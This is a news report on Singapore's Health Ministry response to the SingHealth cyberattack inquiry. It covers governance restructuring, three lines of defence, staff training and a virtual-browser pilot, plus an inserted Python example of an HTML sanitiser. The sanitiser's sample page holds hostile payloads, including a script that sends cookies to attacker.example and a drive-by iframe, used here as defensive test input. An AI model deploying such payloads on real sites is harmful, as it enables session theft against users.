Singapore’s Minister for Health outlines key responses to COI report’s recommendations
Minister for Health Gan Kim Yong delivered a ministerial statement on the Committee of Inquiry (COI) report on the SingHealth cyberattack in the Singapore Parliament on January 15 2019. In the statement, he said that the Ministry of Health (MOH) has appointed a Cybersecurity Advisory Committee to conduct a horizontal review of the cybersecurity governance structures and processes across the public healthcare clusters and Integrated Health Information Systems (IHiS), the IT agency for the Ministry.
He also outlined four key responses to the COI report’s recommendations. The first is enhancing governance and organisational structures as there is a “need for clearer cybersecurity risk ownership and accountability between IHiS and the public healthcare clusters, underpinned by a strong relationship to avoid fragmenting the Ministry’s healthcare IT strategy.”
At MOH, the Chief Information Security Officer (CISO) is currently also the Director of Cyber Security Governance at IHiS but these roles will be separated. The MOH CISO will be supported by a dedicated office in MOH and report to the Permanent Secretary. The MOH CISO office will be the cybersecurity sector lead for the healthcare sector. It will coordinate efforts to protect Critical Information Infrastructure in the healthcare sector, and ensure that the sector fulfils its regulatory obligations under the Cybersecurity Act. For its part, IHiS will have its own separate Director of Cyber Security Governance.
At the clusters, the cluster Group CIO office will now be made fully accountable to the respective cluster management and Boards. The GCIO office will be adequately resourced to carry out its role. The position of the Cluster Information Security Officer will be elevated to report directly to cluster management, and be accountable to the IT and Risk Management Committees of the cluster Boards.
Secondly, a cybersecurity model with multiple lines of defence will be put in place. A more robust ‘Three Lines of Defence’ structure will be established within the public healthcare sector:
- The first line comprises units and personnel who develop, deliver and operate the IT systems. This is the Delivery Group. MOH will strengthen the IT delivery group to better integrate cybersecurity into IT delivery initiatives, improve the management of network security, and increase emphasis on security architecture and monitoring.
- The second line of defence comprises units and personnel who have the specific responsibility to oversee security strategy, risk management and compliance. MOH will strengthen and elevate this second line of defence by establishing a dedicated Cyber Defence Group in IHiS headed by a senior leader at or equivalent to the Deputy Chief Executive level. The strengthened group will have independent oversight of cybersecurity implementation, compliance and risk management, and will oversee incident reporting and management. This will ensure that cybersecurity is managed at the senior management level, and an appropriate balance is struck between service delivery and cybersecurity considerations.
- The third line of defence comprises checks and assurances independent of IHiS and the healthcare clusters, and therefore independent of the first two lines of defence. MOH Holdings Group Internal Audit will continue to play this role. MOH also intends to commission and tap on independent third parties where appropriate.
The third aspect would be improving the cybersecurity awareness and capacity of staff. Starting this year, IHiS will engage specialist providers to conduct realistic hands-on “Cyber Range” simulation training to raise the competence of their security incident response personnel. IHiS also intends to learn from GovTech’s bug bounty and vulnerability disclosure programmes and start similar efforts.
Lastly, a tiered model of Internet access will be considered. In its report, the COI has recommended that an internet access strategy which minimises exposure to external threats should be implemented. Following the cyberattack, temporary Internet Surfing Separation (ISS) was implemented across Singapore’s public healthcare sector.
However, the implementation of the ISS has posed several challenges in the provision of patient care in some areas such as emergency care, decision-support for prescriptions and treatments, access to patient education resources, and booking of clinical appointments. ISS also caused delays to frontline patient management and backend administrative tasks. Research and education initiatives in the public healthcare institutions have also been impacted by ISS.
The current model of ISS is still workable, but longer-term solutions that are more efficient and sustainable are needed. One such solution is the “virtual browser”, which routes Internet access through strictly controlled and monitored servers rather than the user’s own workstation. The server acts like a decontamination room: a file fetched from the Internet is opened there, and only an image or a sanitised copy of it is sent on to the recipient. Any malicious material or hidden content is ‘left behind’ in the decontamination room, so it never reaches the clinical network, greatly reducing cybersecurity risk. The isolation servers themselves then become a concentrated target and must be hardened and monitored accordingly.
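The “decontamination room” mechanism above, as an added example that is not code from MOH, IHiS or the NUHS pilot: a toy content-disarm step in Python that rebuilds an untrusted HTML page from scratch, keeping only its visible text and a small whitelist of structural tags. Scripts, event handlers, embedded frames and `javascript:` links never appear in the output because the copy is regenerated rather than edited in place. The sample page, the tag lists and the function names are constructed for illustration; a production virtual browser typically renders the page to pixels on the isolated server, which this text-only copy only approximates.

```python
"""Toy 'decontamination room' for HTML (constructed example, not IHiS/NUHS code).

The untrusted document is parsed on the isolated side and a fresh copy is
emitted that contains only text plus a whitelist of structural tags. Every
attribute is discarded, so on* handlers and javascript: URLs cannot survive;
elements whose content is itself dangerous (script, iframe, ...) are dropped
together with their content. What was left behind is recorded for monitoring.
"""
from html import escape
from html.parser import HTMLParser

# Structural tags allowed in the rebuilt copy (assumed whitelist for this example).
SAFE_TAGS = {"p", "h1", "h2", "h3", "ul", "ol", "li", "b", "i", "em", "strong",
             "br", "table", "tr", "td", "th"}
# Elements whose content is dropped entirely, text included.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript"}
# Safe tags that never take a closing tag.
VOID = {"br"}


class Decontaminator(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # fragments of the rebuilt copy
        self.open_tags = []    # safe tags currently open, to keep output well-formed
        self.skip_depth = 0    # >0 while inside a DROP_CONTENT element
        self.dropped = []      # audit trail of what stayed in the decontamination room

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            self.dropped.append(f"element <{tag}>")
            return
        if self.skip_depth:
            return
        # No attribute is ever copied; record the ones that carried active content.
        for name, value in attrs:
            active_url = value is not None and value.strip().lower().startswith("javascript:")
            if name.startswith("on") or active_url:
                self.dropped.append(f"attribute {name} on <{tag}>")
        if tag in SAFE_TAGS:
            self.out.append(f"<{tag}>")
            if tag not in VOID:
                self.open_tags.append(tag)
        # Unknown tags (html, body, a, img, ...) vanish; any text inside them is kept.

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        # Close anything left open inside the element being closed.
        while self.open_tags:
            opened = self.open_tags.pop()
            self.out.append(f"</{opened}>")
            if opened == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))  # re-escape so text can never become markup


def decontaminate(untrusted_html: str) -> tuple[str, list[str]]:
    """Return (sanitised copy, list of dropped items) for an untrusted HTML document."""
    parser = Decontaminator()
    parser.feed(untrusted_html)
    parser.close()
    while parser.open_tags:  # close tags the source left dangling
        parser.out.append(f"</{parser.open_tags.pop()}>")
    return "".join(parser.out), parser.dropped


# Constructed sample of a booby-trapped clinical reference page.
UNTRUSTED_HTML = """<html><body onload="alert(1)">
<script>fetch('https://attacker.example/x?c='+document.cookie)</script>
<h1>Warfarin</h1>
<p>Avoid <b>NSAIDs</b>; see <a href="javascript:steal()">details</a>.</p>
<iframe src="https://attacker.example/drive-by"></iframe>
<img src="x" onerror="alert(2)">
<ul><li>Check INR</li><li>Monitor bleeding</li></ul>
</body></html>"""

if __name__ == "__main__":
    clean, left_behind = decontaminate(UNTRUSTED_HTML)
    print(clean)
    print("left behind:", left_behind)
```

The audit list is the part a SOC would actually consume: a burst of dropped `on*` handlers or `javascript:` links from one site is a useful signal even though the user never saw anything harmful.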
This “virtual browser” pilot will begin in the first quarter in 2019 at the National University Health System. “Virtual browsers” will be deployed in selected job functions at selected departments and clinics. Some of the job roles participating in the pilot include frontline pharmacists, and emergency department clinicians.
The conduct and evaluation of the pilot is expected to take about 6 months, and MOH will work closely with the Cyber Security Agency of Singapore (CSA) to assess the cybersecurity adequacy of the solution. The effectiveness of the virtual browser for clinical work will also be assessed.
Mandatory contributions to the National Electronic Health Record (NEHR) system will continue to be deferred as it is undergoing a series of cybersecurity assessments conducted by the CSA, GovTech, and independent firm PwC. The NEHR will also be subject to further testing and reviews, including exercises to test its defences against targeted attacks, as well as business continuity and disaster recovery plans.